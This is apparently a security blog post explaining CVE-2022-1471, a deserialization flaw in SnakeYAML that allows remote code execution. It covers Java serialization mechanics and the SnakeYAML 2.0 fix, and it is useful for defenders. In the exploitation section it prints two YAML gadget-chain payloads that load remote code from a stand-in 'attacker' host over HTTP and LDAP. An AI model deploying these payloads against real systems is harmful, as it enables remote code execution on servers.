Resolving CVE-2022-1471  with the SnakeYAML 2.0 Release

In October of 2022, a critical flaw was found in the SnakeYAML package, which allowed an attacker to benefit from remote code execution by sending malicious YAML content and this content being deserialized by the constructor. Finally, in February 2023, the SnakeYAML 2.0 release was pushed that resolves this flaw, also referred to as CVE-2022-1471. Let’s break down how this version can help you resolve this critical flaw.

Exploring Deserialization

SnakeYAML is a popular Java library to parse YAML (YAML Ain’t Markup Language format). The library can parse all YAML 1.1 specifications [1], native types [2] and supports serializing and deserializing Java objects. The Remote Code Execution vulnerability is due to the library not restricting Java types when deserializing objects using `Constructor`.

Java Serialization has the great promise of taking the state of a full object graph and saving it externally, then magically restoring its state when we deserialize. This is a big promise as this replaced very error prone state saving custom code which was used prior to Java. It may be the single most important reason for Java’s success and is quite magical. We now find how magic becomes dangerous.

Mechanics

Java Serialization (How it Works)

We would take a first look at default Java serialization. Lets take a POJO

public static class Range implements Serializable { 
     private final int low; 
     private final int high; 
       
     public Range(int low, int high) { 
          if (low > high) { 
               throw new IllegalArgumentException("Bad data"); 
          } 
          this.low = low; 
          this.high = high; 
     } 
 
     public int getLow() { 
          return low; 
     } 
 
     public int getHigh() { 
   		  return high; 
     } 
}

Serialization Mechanics

final var range = new Range(3, 4); 
try (final var fileOutputStream = new FileOutputStream("output.ser")){ 
     final var objectOut = new ObjectOutputStream(fileOutputStream); 
     objectOut.writeObject(range); 
}

When the object is passed objectOut.writeObject it is not going to get the values by calling the getter accessors of the POJO.

Instead, it would walk through the object graph and reflectively scrapes the data from fields directly.
This means the object cannot control its output form of its internal state. This breaks encapsulation as the code written inside is no longer used.
This is an extralinguistic behavior as I cannot reason the working of the code by just reading it.

Deserialization Mechanics (How it Works)

When sending data out (Serialization) one can be responsible when the object gets constructed and the invariance is checked. But while Deserialization happens it becomes even more of a nightmare because one is consuming data from a world where hackers are waiting to take over your system.

try (final var fileInputStream = new FileInputStream("output.ser")) { 
     final var objectIn = new ObjectInputStream(fileInputStream); 
     final var range = (Range) objectIn.readObject(); 
     System.out.println(range.getLow()); 
}

When we read output.ser we not enforcing a checksum or any other integrity check. You can tamper the output.ser and send it to deserialize, and it would be happily accepted as input.
When the object is passed objectIn.readObject it is not going to fill up the value by calling the constructor

public Range(int low, int high) { 
if (low > high) { 
      		throw new IllegalArgumentException("Bad data"); 
      } 
      this.low = low; 
      this.high = high; 
}

Instead, it would call a phantom empty constructor which creates the object
The constructor and invariant check would never be performed
This breaks encapsulation as the code written inside is no longer used.

Again this is an extralinguistic behavior as I cannot reason the working of the code by just reading it
We have to write more defensive code to make this class work correctly.

private  void readObject(ObjectInputStream objectInputStream) throws IOException, ClassNotFoundException { 
objectInputStream.defaultReadObject(); 
if (low > high) { 
      throw new IllegalArgumentException("Bad data"); 
      } 
}

Once again this is a private method that would be called during the objectIn.readObject and would check the invariance. Without this defensive code, we cannot make the Range class work as expected.

Key Takeaways

Java serialization/de-serialization makes heavy use of reflection to scrape data from Object graphs.
The use of reflection breaks encapsulation and makes cases for bypassing constructors of objects which prevents checks before creating the object.

Java serialization/de-serialization is extralinguistic behavior as one cannot reason the working of the code by just reading it.
And if one cannot reason the correctness of the code, one cannot reason the security aspect of the code.
Java de-serialization requires phantom methods like readObject to write defensive code to validate the object before we create it.
Java de-serialization supports polymorphic subtypes which open the door for malicious subtypes to attack.
Changing the encoding from native serialization to JSON or YAML doesn't make it more secure as the internal mechanics of reading and creating objects remain the same.

Exploiting the Vulnerability

Gadget Chain:

A gadget is defined as a class or function that’s available within the execution scope of an application. The “Gadget Chain” is when multiple classes or functions are chained together to achieve Arbitrary Code Execution. [3]

SnakeYAML prior to 2.0 did not restrict the type of an object after deserialization, which lets an attacker run arbitrary code if they have control of the YAML document. The `Constructor` method does not limit which classes can be instantiated during deserialization, in fact, any class in the Java classpath is available. A design choice was made to not restrict global tags to fully support the 1.1 specs, but as a result it allows an attacker to specify arbitrary tags in the YAML document which then get converted into Java “gadgets”.

Gadget Chain Examples:

The javax.script.ScriptEngineManager class is from the Oracle/OpenJDK standard. Consider the following gadget chain from Java Unmarshaller Security [4]

!!javax.script.ScriptEngineManager [  
     !!java.net.URLClassLoader [[  
          !!java.net.URL ["http://attacker/"]  
     ]]  
]

In this example, arbitrary code execution is possible after SnakeYAML deserializes the following data. Specifically, SnakeYAML type checks the root element, but nested properties are not type checked, which can lead to disastrous consequences. An attacker can insert a reverse shell payload, resulting in shell access on the server running SnakeYAML. Here's another example of a gadget chain in SnakeYAML using JdbcRowset

!!com.sun.rowset.JdbcRowSetImpl  
     dataSourceName: ldap://attacker/obj 
      autoCommit: true

Mitigation:

Since 2.0, the SnakeYAML `Constructor` now inherits from `SafeConstructor`, which prevents an attacker from accessing the classpath by default. When instantiating the `Constructor` or `SafeConstuctor`, you must pass a `LoaderOptions` object where one can further set parsing restrictions. By default, all global tags are now blocked.

Here's the exploit in action using the vulnerable SnakeYAML 1.33.

I run the Python simple server to show a successful GET request. After running the code, a successful GET request from localhost appears. Success!

Securing the Vulnerability with SnakeYAML 2.0

Now, let’s jump into how SnakeYAML 2.0 prevents the attack.

To demonstrate how the `TagInspector` prevents global tags, I instantiate a new `TagInspector`, without overriding the default `isGlobalTagAllowed`, which prevents all global tags from being parsed as a Java class. If you want to allow-list some global tags, it's also possible by defining your own `isGlobalTagAllowed` method. Please note it is not necessary to instantiate the `TagInspector` if you want to block all global tags, I wanted to show the default function.

I then run the code, but it returns with an exception!

The remote code execution is unsuccessful.

If you want to test out the code yourself, check out: https://github.com/1fabunicorn/SnakeYAML-CVE-2022-1471-POC

Keeping Your Applications Secure in the Future

How to Defend from Java De-Serialization attacks:

Be extra careful with untrusted data from the internet.
Don't create complex Objects like Maps in your DTO objects which are internet-facing, that can open the doors for attacks.
Always do a code review of DTOs facing the internet to reason its security aspects.
Always use final classes as DTOs and field variables to disable polymorphic subtype parsing in the parsing library.
Try using Java Records which restricts things you can do with classes as DTO, and it forces parsing libraries to call the constructor.

Run the SCA scanner to find out if you’re affected by a CVE and update to the fixed versions.
The fixed versions of parsing libraries have the defensive code and filters to protect from attacks so never skip version upgrades.

In conclusion, if you’re using SnakeYAML, ensure you have the correct `LoaderOptions` restrictions in place [5], or use the SnakeYAML engine [6] which is safe by default because it does not allow custom instances. Since SnakeYAML is used as a dependency in many projects including Spring, it may be necessary to mitigate the finding only if it’s confirmed the library depending on SnakeYAML is not vulnerable. For example, Spring is unaffected as it only parses trusted YAML, which is used for the configuration [7] [8]. If you're using SnakeYAML to parse untrusted YAML, please ensure you upgrade to 2.0 to prevent global tags. If your scan includes SnakeYAML < 2.0, a high-severity vulnerability will appear, and if you use the `Constructor` method a vulnerable method finding will appear on your scan highlighting the vulnerable usage.

To keep a pulse check on your software supply chain and its dependencies, make sure you’re integrating Software Composition Analysis (SCA) scans into your software development workflows.

A special thank you goes to Srinivasan Raghavan and Mateusz Krzeszowiec for their assistance in writing and reviewing this research.

[1] https://yaml.org/spec/1.1/current.html

[2] https://yaml.org/type/index.html

[3] https://brandur.org/fragments/gadgets-and-chains#gadgets-and-chains

[4] https://github.com/mbechler/marshalsec

[5] https://www.javadoc.io/doc/org.yaml/snakeyaml/latest/org/yaml/snakeyaml/LoaderOptions.html

[6] https://bitbucket.org/snakeyaml/snakeyaml-engine/src/master/

[7] https://github.com/spring-projects/spring-framework/pull/30048

[8] https://github.com/spring-projects/spring-boot/issues/33457